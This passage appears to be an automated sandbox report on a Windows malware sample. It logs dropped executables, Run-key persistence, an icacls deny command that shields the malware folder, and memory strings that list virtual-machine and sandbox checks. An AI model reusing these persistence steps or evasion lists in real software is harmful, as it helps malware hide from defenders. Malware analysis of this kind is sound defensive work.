    Source: 1AED.exe.1.drStatic PE information: section name: .cadaya
    Source: B336.exe.1.drStatic PE information: section name: .symtab
    Source: DE4C.exe.1.drStatic PE information: section name: .hurenac
    Source: DE4C.exe.1.drStatic PE information: section name: .lized
    Source: 9760.exe.1.drStatic PE information: section name: .jav
    Source: 9760.exe.1.drStatic PE information: section name: .lutu
    Source: 849F.exe.1.drStatic PE information: section name: .vib
    Source: 849F.exe.1.drStatic PE information: section name: .nuroz
    Source: ECAC.exe.1.drStatic PE information: section name: .lixo
    Source: ECAC.exe.1.drStatic PE information: section name: .bobo
    Source: DC3D.exe.1.drStatic PE information: section name: .yaz
    Source: DC3D.exe.1.drStatic PE information: section name: .katosa
    Source: 1128.exe.1.drStatic PE information: section name: Fdfgtrg
    Source: A4A.exe.1.drStatic PE information: section name: .lixo
    Source: A4A.exe.1.drStatic PE information: section name: .bobo
    Source: F207.exe.1.drStatic PE information: section name: .yij
    Source: F207.exe.1.drStatic PE information: section name: .xad
    Source: ADEC.exe.1.drStatic PE information: section name: .todur
    Source: ADEC.exe.1.drStatic PE information: section name: .bimole
    Source: C597.exe.1.drStatic PE information: section name: .geguja
    Source: C597.exe.1.drStatic PE information: section name: .dilef
    Source: rirdbih.1.drStatic PE information: section name: .xepexi
    Source: rirdbih.1.drStatic PE information: section name: .bigisi
    Source: sardbih.1.drStatic PE information: section name: .yij
    Source: sardbih.1.drStatic PE information: section name: .xad
    Source: gdrdbih.1.drStatic PE information: section name: .vib
    Source: gdrdbih.1.drStatic PE information: section name: .nuroz
    Source: 170F.tmp.exe.12.drStatic PE information: section name: beew93K
    Source: llpb1133.exe.17.drStatic PE information: section name: _RDATA
    Source: llpb1133.exe.17.drStatic PE information: section name: .vmp0
    Source: llpb1133.exe.17.drStatic PE information: section name: .vmp1
    Source: A4A.exe.18.drStatic PE information: section name: .lixo
    Source: A4A.exe.18.drStatic PE information: section name: .bobo
    Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
    Source: yuzhenzhang.exe.17.drStatic PE information: real checksum: 0x2b520 should be: 0x29e17
    Source: 352F.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x3b383b
    Source: 170F.tmp.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x3bfca0
    Source: B336.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x98b5dd
    Source: llpb1133.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x38b641
    Source: FD42.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x6467
    Source: vcredist_5f4680.dll.9.drStatic PE information: real checksum: 0x0 should be: 0xdd77
    Source: 42FE.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x3b383b

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rirdbihJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sardbihJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gdrdbihJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rirdbihJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeFile created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1128.exeJump to dropped file
    Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\170F.tmp.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sardbihJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C597.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD42.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gdrdbihJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\42FE.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1AED.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\352F.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DE4C.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeFile created: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ECAC.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9760.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeFile created: C:\Users\user\AppData\Local\Temp\llpb1133.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8EAD.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F207.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\1128.exeFile created: C:\Users\user\AppData\Roaming\vcredist_5f4680.dllJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\849F.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DC3D.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B336.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeFile created: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A4A.exeJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ADEC.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rirdbih:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sardbih:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gdrdbih:Zone.Identifier read attributes | deleteJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
    Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\1128.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\1128.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\8EAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\42FE.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\A4A.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\352F.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\ECAC.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DC3D.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: Yara matchFile source: 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.356632999.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 1128.exe PID: 4608, type: MEMORYSTR
    Source: file.exe, 00000000.00000002.288195821.0000000000759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: rundll32.exe, 0000000C.00000003.353421199.00000156F17AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.352788321.00000156F15AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PARTIAL RECORD WITHOUT END(1)PARTIAL RECORD WITHOUT END(2)MISSING START OF FRAGMENTED RECORD(1)MISSING START OF FRAGMENTED RECORD(2)ERROR IN MIDDLE OF RECORDUNKNOWN RECORD TYPE %UCHECKSUM MISMATCHBAD RECORD LENGTHKERNEL32.DLLEXITPROCESS/BIN/RUNTIME.EXERTLGETVERSION%08X.LUA/EXTENSION/%08X.LUA/BIN/I386/STUB.DLL/BIN/KEEPASSHAX.DLL/BIN/I386/STUBMOD.BIN/BIN/I386/COREDLL.BIN/ETC/LICENSE.KEYHTTP:///ETC/PUK.KEYGET13CONNECTIONUPGRADEUPGRADEWEBSOCKETUSER-AGENTCURL/5.9SEC-WEBSOCKET-KEYSEC-WEBSOCKET-VERSIONABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZMACHINEGUIDSOFTWARE\MICROSOFT\CRYPTOGRAPHYISWOW64PROCESS\GLOBAL??ASWHOOK.DLLKLKBDFLTRTP_PROCESS_MONITOR360SELFPROTECTIONV1.0.3705GETREQUESTEDRUNTIMEINFOGETCORVERSIONCORBINDTORUNTIMECLRCREATEINSTANCEWKSCORBINDTORUNTIMEEXV4.0.30319V2.0.50727MSCOREE.DLL%PCOMMANDLINECURRENTDIRECTORY"%S" %S"%S"CREATEWIN32_PROCESSROOT\CIMV2RUNAS.EXE.EXEDUMPFINDSTRICMPPRINTTOSTRING?.\;@%SCJSONWINREGMESSAGEPACKPRELOADPACKAGE_GFRAMEWORKLOADEDDECRYPT_UTF8SEND_DATAREG_EXPORTGCREADFILEGET_ARCHPS_GETPATHSET_COMMITADD_FILEADD_STREAMPATH_EXISTFILE_EXISTPARSE_PATHFS_SEARCHNAMEFILENAMEFILESIZEHIGHFILESIZELOW%S\%S...%S\*.*
    Source: 1128.exe, 00000009.00000003.346817928.0000000000F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;*!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;*!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORVIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST 